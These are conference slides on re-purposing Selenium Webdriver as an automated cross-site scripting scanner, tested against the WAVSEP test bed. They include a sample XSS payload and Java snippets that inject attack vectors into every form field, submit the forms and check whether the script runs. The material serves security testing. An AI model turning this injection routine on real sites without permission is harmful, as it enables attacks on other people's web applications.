Post on 07-Aug-2015
Adrian Rapan, LMAX
Re-purposing Webdriver
for
Security Testing
www.eurostarconferences.com
@esconfs #esconfs
Security testing
• Open Web Application Security Project (OWASP)
• MITM (man-in-the-middle) attack
• DoS attack
• Metasploit
• BackTrack (Linux distribution used in penetration testing)
• Acunetix, Netsparker, N-Stalker, ProxyStrike, XSSS
What about…
• Webdriver?
• It tests websites
• Drivers for different browser/OS pairs
• With a bit of tinkering can manipulate the DOM
How
• The test bed: Application Vulnerability Scanner Evaluation Project (WAVSEP)
– Reflected/Stored Cross-Site Scripting (XSS): 66 test cases, implemented in 64 jsp pages (GET & POST)
– 7 different categories of false positive Reflected XSS vulnerabilities (GET & POST )
– Payloads comprising of 44 attack vectors
Ingredients
• The attack vectors:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet and save it as an XML
• Javascript snippets like:
<INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScriptingAcademia12');"></script>
Transparency
• Commercial tools…how do they do it???
• The security scanners tell you about vulnerabilities
• They’ll even offer a solution
• But how do they do it???
What about…
• Webdriver?
• Drives the browser just like a tester would
• Total transparency over the value of running a test
• Any security tests run using a real browser
• Lower false-positive rate of detection
Test case
• The browser navigates to the required webpage
• Webdriver scans for input forms which represent the delivery channel for the XSS payloads
• The XSS attack vectors are inserted in the input fields of the form
• The form is submitted
• The attack efficiency is verified by detecting the execton of Javascript snippet
Under the hood
• Getting the urls from a website as an XML
– Few tools online. Used http://www.xml-sitemaps.com/crawlproc.html?&initurl=<<website>>
Under the hood
• Each url is opened by webdriver and scanned for FORMs
allForms = driver.findElements(By.xpath("//form"));
• All inputs from the FORM
allInputs = form.findElements(By.xpath(".//input"));
• Each input is populated by the attack vector
input.sendKeys(vector);
Under the hood
• Submit the injected FORM
form.findElement(By.xpath(".//input[@type='submit']")).click();
• Repeat for each FORM from each url
Under the hood
• The actual Webriver test for an url
webDriver.attack(urlToAttack).using(attackVector).run();
webDriver.executionReportFor(attackVector).waitFor();
Now for the tricky part
• Detecting if the attack succeeded
• There is, one way… but it’s similar to watching paint dry
The automated way
driver.switchTo().alert()
• But what if the alert is hidden in the DOM waiting for a triggering event, like a click
Another “dirty” automated way
• Use the infamous JavascriptExecutor
((JavascriptExecutor) driver).executeScript(payloadToExecute);
• It goes against the intended usage of Webdriver – to test as a tester would
And the method is
• Running an xpath to find the “hidden” payload and then executing it
((JavascriptExecutor) driver).executeScript("return (document.evaluate(\"//@*[contains(.,<<the attack vector>>')]\", document, null, XPathResult.STRING_TYPE, null)).stringValue")
Some conclusions
• Writing tests to cover security test cases isn’t that hard
• The attack vectors for XSS are publicly available
• Using Webdriver as a security tool might be slow but offers more transparency and
• Best of all, it’s free